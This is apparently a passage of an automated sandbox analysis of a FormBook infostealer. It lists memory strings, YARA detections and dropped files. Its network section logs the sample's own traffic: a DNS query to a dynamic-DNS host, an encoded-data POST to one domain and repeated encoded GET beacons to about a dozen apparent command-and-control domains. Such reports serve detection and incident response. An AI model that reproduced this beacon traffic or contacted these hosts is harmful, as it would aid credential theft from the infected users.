Source: explorer.exe, 00000003.00000000.451429720.0000000008277000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736
Source: explorer.exe, 00000003.00000000.451381452.0000000008246000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gt
Source: explorer.exe, 00000003.00000000.451381452.0000000008246000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.450826772.00000000080FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.430092950.000000000DDF0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=
Source: explorer.exe, 00000003.00000000.430092950.000000000DDF0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: explorer.exe, 00000003.00000000.462438862.000000000DDF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.484235520.000000000DDF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.430092950.000000000DDF0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: explorer.exe, 00000003.00000000.462438862.000000000DDF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.484235520.000000000DDF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.430092950.000000000DDF0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1#
Source: explorer.exe, 00000003.00000000.430092950.000000000DDF0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: explorer.exe, 00000003.00000000.430092950.000000000DDF0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=16c
Source: explorer.exe, 00000003.00000000.462438862.000000000DDF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.484235520.000000000DDF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.430092950.000000000DDF0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1rdw
Source: wscript.exe, 00000004.00000002.928057135.0000014D0BB43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.856381747.0000014D0BB63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.931546751.0000020FBE910000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: explorer.exe, 00000003.00000000.482326473.0000000008277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.428747100.0000000008277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.451429720.0000000008277000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/
Source: explorer.exe, 00000003.00000000.482326473.0000000008277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.428747100.0000000008277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.451429720.0000000008277000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/j
Source: explorer.exe, 00000003.00000000.482326473.0000000008277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.428747100.0000000008277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.451429720.0000000008277000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: explorer.exe, 00000003.00000000.482326473.0000000008277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.428747100.0000000008277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.451429720.0000000008277000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png780-3
Source: explorer.exe, 00000003.00000000.482326473.0000000008277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.428747100.0000000008277000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.451429720.0000000008277000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.pngT
Source: explorer.exe, 00000003.00000000.450958349.0000000008183000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.428253369.0000000008183000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: explorer.exe, 00000003.00000000.446812221.00000000060FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.476632514.00000000060FE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0&
Source: explorer.exe, 00000003.00000000.446812221.00000000060FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.476632514.00000000060FE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0BW
Source: explorer.exe, 00000003.00000000.476750863.0000000006153000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.446911771.0000000006153000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0LMEM
Source: help.exe, 00000009.00000002.930456498.0000000003752000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.namebrightstatic.com/images/bg.png)
Source: help.exe, 00000009.00000002.930456498.0000000003752000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.namebrightstatic.com/images/error_board.png)
Source: help.exe, 00000009.00000002.930456498.0000000003752000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.namebrightstatic.com/images/header_bg.png)
Source: help.exe, 00000009.00000002.930456498.0000000003752000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.namebrightstatic.com/images/logo_off.gif)
Source: help.exe, 00000009.00000002.930456498.0000000003752000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.namebrightstatic.com/images/site_maintenance.png)
Source: unknown HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.siberup.xyzConnection: closeContent-Length: 416Cache-Control: no-cacheOrigin: http://www.siberup.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.siberup.xyz/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 54 42 6a 6c 49 4a 43 7a 76 72 46 6c 48 44 46 71 44 41 63 48 44 58 65 58 65 4c 38 31 73 66 78 51 69 68 4b 71 32 4a 6a 49 56 68 44 33 37 6d 66 41 70 79 41 35 66 72 6e 43 32 53 52 33 4e 6d 6b 68 35 38 6a 34 50 53 58 42 5a 71 6f 2d 6e 54 44 61 4b 51 64 4c 72 69 34 53 47 38 72 37 75 58 72 56 4d 57 50 66 6f 4f 64 2d 30 4a 5a 48 47 6c 62 58 51 39 33 67 7a 4e 43 32 41 63 59 6e 62 6f 4e 6c 6d 56 7e 4b 6a 49 7a 47 48 7a 59 4d 77 45 30 68 44 50 6d 7a 35 71 65 5f 6f 66 58 69 42 56 76 79 52 5f 65 6f 57 48 55 31 41 58 37 43 35 49 4a 36 73 53 61 38 77 48 46 6f 42 58 67 35 57 5f 44 53 6f 73 69 78 6f 57 31 38 5a 54 69 6e 6e 48 73 48 34 62 51 53 54 58 4c 38 55 42 4a 6e 67 65 56 55 68 38 43 56 76 45 7a 36 31 63 32 44 75 62 75 6e 36 4a 44 72 65 63 43 4a 67 64 49 4b 57 61 63 53 72 51 6c 34 67 6d 41 61 36 46 76 6a 47 4b 71 62 6f 30 76 62 58 57 56 55 74 66 69 64 6c 37 76 62 41 38 4e 6b 4a 34 44 57 5a 4b 48 59 39 62 59 46 4c 41 57 4c 33 70 73 50 63 51 62 75 46 4c 4f 42 67 65 67 50 58 51 70 52 34 6b 36 6d 31 6e 49 59 44 58 6b 50 68 4c 6a 4a 58 45 59 45 33 2d 74 4c 48 6d 42 79 57 31 28 63 5a 31 6a 74 69 71 31 6b 4e 56 41 71 77 48 36 76 6a 35 7a 64 78 67 46 49 6c 4f 49 70 5a 46 32 41 73 36 34 70 30 58 37 32 6e 36 42 64 7e 47 45 2e 00 00 00 00 00 00 00 00 Data Ascii: 3fk4oN=TBjlIJCzvrFlHDFqDAcHDXeXeL81sfxQihKq2JjIVhD37mfApyA5frnC2SR3Nmkh58j4PSXBZqo-nTDaKQdLri4SG8r7uXrVMWPfoOd-0JZHGlbXQ93gzNC2AcYnboNlmV~KjIzGHzYMwE0hDPmz5qe_ofXiBVvyR_eoWHU1AX7C5IJ6sSa8wHFoBXg5W_DSosixoW18ZTinnHsH4bQSTXL8UBJngeVUh8CVvEz61c2Dubun6JDrecCJgdIKWacSrQl4gmAa6FvjGKqbo0vbXWVUtfidl7vbA8NkJ4DWZKHY9bYFLAWL3psPcQbuFLOBgegPXQpR4k6m1nIYDXkPhLjJXEYE3-tLHmByW1(cZ1jtiq1kNVAqwH6vj5zdxgFIlOIpZF2As64p0X72n6Bd~GE.
Source: unknown DNS traffic detected: queries for: dilshadkhan.duia.ro
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEMEN43A2RNb83bcySA==&Eh=mhUxl HTTP/1.1Host: www.topings33.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=cDXfWuCokJFrdCwhVntnDB+RdogU7uBP5U/Sv42Lexzi+FyRpCsvSOHB1BJBbWkp2bvyU0/jbw==&Eh=mhUxl HTTP/1.1Host: www.siberup.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=Hfm8tjP++bF99H8Yixu4yiAA2pucxCUNYZIpJGNk6F/7VNXQ3kF6oq1cnnPYkdM2cMsNINi87w==&Eh=mhUxl HTTP/1.1Host: www.harmlett.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=hgAcLcCQcJ9fw2P/Tuk0sK1oy/IuL6u1zsG1wPPsT2rq6CikgixxXMntvKpZqETXTWLI6sH0ZA==&Eh=mhUxl HTTP/1.1Host: www.brandpay.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=v4u/ceKk0Zb55n135mmkOO9h9NxJ7kGAyBx+qrEyA785N/4y0zrdRsBV3cMwWbOW5k3YBKZGqA==&Eh=mhUxl HTTP/1.1Host: www.tentanguang.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=uZkZa9PDR+t76IUsjgXNksX18rdkaBR0jzgf+2QyrrE0BTZPOy5IBVEfZpo9ngwjPS7HOCJSNA==&Eh=mhUxl HTTP/1.1Host: www.localbloom.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=25I4eedf3LYXj+mrZ2jI6olVDZbg0jTgzRvorLdGhmBPpJDDPx12pMPLDd38wf67F/cvJLwRDA==&Eh=mhUxl HTTP/1.1Host: www.shcylzc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=0pptgqp0MeRyeb/9nmudohOLKq4u2ksDwR1w+rnfL4/we0tceqenlGY7vNOGaAQzxdf5zVwFvA==&Eh=mhUxl HTTP/1.1Host: www.getbusinesscreditandfunding.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=1Nsioc0lpQImfCEv7q3CJRvbkNIovvFEONaUY8zyneWF7ypKO8GgemnIz/Jz3qNJ0RZyolUFog==&Eh=mhUxl HTTP/1.1Host: www.xn--wsthof-camping-gsb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=upNApQGgxnIpkDsed4j6UePR+EOmKhNhiuHKrn3aPCq0+c3DSqp4vkB5DGytvWTvww8fhFgzIA==&Eh=mhUxl HTTP/1.1Host: www.waermark.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=RNX6HKFDcklLmbBc9PWX652dIgRYJcuZVnkYPjFZaGFpi0fgSjcQ52/zYZHNiyjWO0COcN7HSw==&Eh=mhUxl HTTP/1.1Host: www.vitality-patients.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEMEN43A2RNb83bcySA==&Eh=mhUxl HTTP/1.1Host: www.topings33.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?aDHdzD=vpgdJ4mxrh&3fk4oN=Hfm8tjP++bF99H8Yixu4yiAA2pucxCUNYZIpJGNk6F/7VNXQ3kF6oq1cnnPYkdM2cMsNINi87w== HTTP/1.1Host: www.harmlett.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=upNApQGgxnIpkDsed4j6UePR+EOmKhNhiuHKrn3aPCq0+c3DSqp4vkB5DGytvWTvww8fhFgzIA==&aDHdzD=vpgdJ4mxrh HTTP/1.1Host: www.waermark.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=0pptgqp0MeRyeb/9nmudohOLKq4u2ksDwR1w+rnfL4/we0tceqenlGY7vNOGaAQzxdf5zVwFvA==&aDHdzD=vpgdJ4mxrh HTTP/1.1Host: www.getbusinesscreditandfunding.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=0pptgqp0MeRyeb/9nmudohOLKq4u2ksDwR1w+rnfL4/we0tceqenlGY7vNOGaAQzxdf5zVwFvA==&Eh=mhUxl HTTP/1.1Host: www.getbusinesscreditandfunding.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?3fk4oN=1Nsioc0lpQImfCEv7q3CJRvbkNIovvFEONaUY8zyneWF7ypKO8GgemnIz/Jz3qNJ0RZyolUFog==&Eh=mhUxl HTTP/1.1Host: www.xn--wsthof-camping-gsb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Creates a DirectInput object (often for capturing keystrokes)
Source: u8g48fg0phzxan.exe, 00000012.00000002.875917798.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 0.3.wscript.exe.18737493000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.u8g48fg0phzxan.exe.1200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.u8g48fg0phzxan.exe.1200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.bin.exe.fc0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.u8g48fg0phzxan.exe.1200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.u8g48fg0phzxan.exe.1200000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.18737493000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.u8g48fg0phzxan.exe.1200000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.bin.exe.fc0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.930406757.00000000035D7000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.396143757.0000018737B4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.907157979.00000000004B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.396132606.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.907218726.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.907579825.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.506353568.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.476161030.00000000056FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.506312431.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.509633040.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.403282167.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.401485151.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.871758579.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.876080332.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.871170118.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.870726795.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.446024174.00000000056FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.403466311.0000018737EA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.871469677.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.397537336.0000018737493000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.395957162.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.907268492.0000000000730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.402063776.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Irlr8ftbp\u8g48fg0phzxan.exe, type: DROPPED

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0.3.wscript.exe.18737493000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.3.wscript.exe.18737493000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.u8g48fg0phzxan.exe.1200000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 18.0.u8g48fg0phzxan.exe.1200000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 18.2.u8g48fg0phzxan.exe.1200000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 18.2.u8g48fg0phzxan.exe.1200000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.bin.exe.fc0000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.bin.exe.fc0000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.u8g48fg0phzxan.exe.1200000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 18.0.u8g48fg0phzxan.exe.1200000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.u8g48fg0phzxan.exe.1200000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 18.0.u8g48fg0phzxan.exe.1200000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.3.wscript.exe.18737493000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.3.wscript.exe.18737493000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 18.0.u8g48fg0phzxan.exe.1200000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 18.0.u8g48fg0phzxan.exe.1200000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.bin.exe.fc0000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.bin.exe.fc0000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.930406757.00000000035D7000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.930406757.00000000035D7000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.396143757.0000018737B4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.396143757.0000018737B4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.907157979.00000000004B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.907157979.00000000004B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.396132606.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.907218726.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.907218726.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.907579825.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.907579825.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.506353568.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.506353568.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.476161030.00000000056FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.476161030.00000000056FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.506312431.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.506312431.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.509633040.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.509633040.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.403282167.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.401485151.000001873784D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.871758579.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000000.871758579.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.876080332.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.876080332.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.871170118.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000000.871170118.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.870726795.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000000.870726795.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.446024174.00000000056FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.446024174.00000000056FF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.403466311.0000018737EA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.403466311.0000018737EA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.871469677.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000000.871469677.0000000001201000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.397537336.0000018737493000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
